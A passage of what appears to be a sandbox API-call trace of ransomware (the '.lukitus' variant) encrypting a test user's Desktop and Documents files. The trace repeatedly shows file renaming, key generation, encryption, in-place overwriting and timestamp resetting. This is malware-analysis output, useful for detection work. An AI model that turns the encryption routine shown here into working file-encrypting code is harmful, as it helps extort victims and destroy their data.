pbBuffer=0x281f594) returned 1 [0107.306] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.306] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.306] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\r1_647.docx" (normalized: "c:\\users\\aetadzjz\\desktop\\r1_647.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.306] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\r1_647.docx" (normalized: "c:\\users\\aetadzjz\\desktop\\r1_647.docx"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-E6373D05-052CD23B85B0.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-e6373d05-052cd23b85b0.lukitus"), dwFlags=0x9) returned 1 [0107.308] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.308] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.315] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xd7c2, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xd7c2, lpOverlapped=0x0) returned 1 [0107.315] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.315] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xd7c2, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xd7c2, lpOverlapped=0x0) returned 1 [0107.316] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.316] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63fd43f0, dwHighDateTime=0x1d31760)) [0107.316] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.316] FlushFileBuffers (hFile=0x324) returned 1 [0107.319] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\TrbkUrGWd.docx" (normalized: "c:\\users\\aetadzjz\\documents\\trbkurgwd.docx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb14a1e80, ftCreationTime.dwHighDateTime=0x1d2906f, ftLastAccessTime.dwLowDateTime=0x4062a550, ftLastAccessTime.dwHighDateTime=0x1d2bd6c, ftLastWriteTime.dwLowDateTime=0x4062a550, ftLastWriteTime.dwHighDateTime=0x1d2bd6c, nFileSizeHigh=0x0, nFileSizeLow=0x184f2)) returned 1 [0107.319] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.320] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\TrbkUrGWd.docx" (normalized: "c:\\users\\aetadzjz\\documents\\trbkurgwd.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.320] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\TrbkUrGWd.docx" (normalized: "c:\\users\\aetadzjz\\documents\\trbkurgwd.docx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-0B1192D3-83011F532CB4.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-0b1192d3-83011f532cb4.lukitus"), dwFlags=0x9) returned 1 [0107.322] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.322] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.327] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x184f2, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x184f2, lpOverlapped=0x0) returned 1 [0107.328] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.328] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x184f2, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x184f2, lpOverlapped=0x0) returned 1 [0107.328] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63ffa550, dwHighDateTime=0x1d31760)) [0107.329] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.329] FlushFileBuffers (hFile=0x324) returned 1 [0107.332] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\XMZB_eGDIWAF.pps" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\xmzb_egdiwaf.pps"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8994990, ftCreationTime.dwHighDateTime=0x1d30581, ftLastAccessTime.dwLowDateTime=0x22e268c0, ftLastAccessTime.dwHighDateTime=0x1d2ffc1, ftLastWriteTime.dwLowDateTime=0x22e268c0, ftLastWriteTime.dwHighDateTime=0x1d2ffc1, nFileSizeHigh=0x0, nFileSizeLow=0x90f2)) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.332] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.333] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.333] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.333] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.333] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.333] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.333] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.333] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\XMZB_eGDIWAF.pps" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\xmzb_egdiwaf.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.333] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\XMZB_eGDIWAF.pps" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\xmzb_egdiwaf.pps"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-0BD9344F-59E2FD1B8612.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-0bd9344f-59e2fd1b8612.lukitus"), dwFlags=0x9) returned 1 [0107.334] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.334] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.340] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x90f2, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x90f2, lpOverlapped=0x0) returned 1 [0107.341] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.341] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x90f2, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x90f2, lpOverlapped=0x0) returned 1 [0107.341] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.341] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x640206b0, dwHighDateTime=0x1d31760)) [0107.341] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.341] FlushFileBuffers (hFile=0x324) returned 1 [0107.344] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\VygBeG2O_CoUDZ0ri-y.docx" (normalized: "c:\\users\\aetadzjz\\documents\\vygbeg2o_coudz0ri-y.docx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x408f7460, ftCreationTime.dwHighDateTime=0x1d2ce04, ftLastAccessTime.dwLowDateTime=0xc413ea20, ftLastAccessTime.dwHighDateTime=0x1d2cf92, ftLastWriteTime.dwLowDateTime=0xc413ea20, ftLastWriteTime.dwHighDateTime=0x1d2cf92, nFileSizeHigh=0x0, nFileSizeLow=0x14c94)) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.344] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.345] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.345] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.345] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.345] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.345] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.345] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.345] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.345] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.345] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\VygBeG2O_CoUDZ0ri-y.docx" (normalized: "c:\\users\\aetadzjz\\documents\\vygbeg2o_coudz0ri-y.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.345] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\VygBeG2O_CoUDZ0ri-y.docx" (normalized: "c:\\users\\aetadzjz\\documents\\vygbeg2o_coudz0ri-y.docx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-16AC9B2B-CF64176B99FB.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-16ac9b2b-cf64176b99fb.lukitus"), dwFlags=0x9) returned 1 [0107.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.346] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.352] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x14c94, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x14c94, lpOverlapped=0x0) returned 1 [0107.352] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.352] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x14c94, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x14c94, lpOverlapped=0x0) returned 1 [0107.353] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.353] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x640206b0, dwHighDateTime=0x1d31760)) [0107.353] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.353] FlushFileBuffers (hFile=0x324) returned 1 [0107.356] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\f2t Xh6k.pps" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\f2t xh6k.pps"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c9efa60, ftCreationTime.dwHighDateTime=0x1d302ea, ftLastAccessTime.dwLowDateTime=0x368faf50, ftLastAccessTime.dwHighDateTime=0x1d2fde5, ftLastWriteTime.dwLowDateTime=0x368faf50, ftLastWriteTime.dwHighDateTime=0x1d2fde5, nFileSizeHigh=0x0, nFileSizeLow=0x172b6)) returned 1 [0107.356] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.356] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.356] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.356] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.356] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.356] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.356] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.356] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.357] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\f2t Xh6k.pps" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\f2t xh6k.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.357] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\f2t Xh6k.pps" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\f2t xh6k.pps"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\F56924BE-9663-41BB-6533C1E4-C0738507F428.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\f56924be-9663-41bb-6533c1e4-c0738507f428.lukitus"), dwFlags=0x9) returned 1 [0107.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.358] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.363] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x172b6, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x172b6, lpOverlapped=0x0) returned 1 [0107.364] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.364] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x172b6, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: 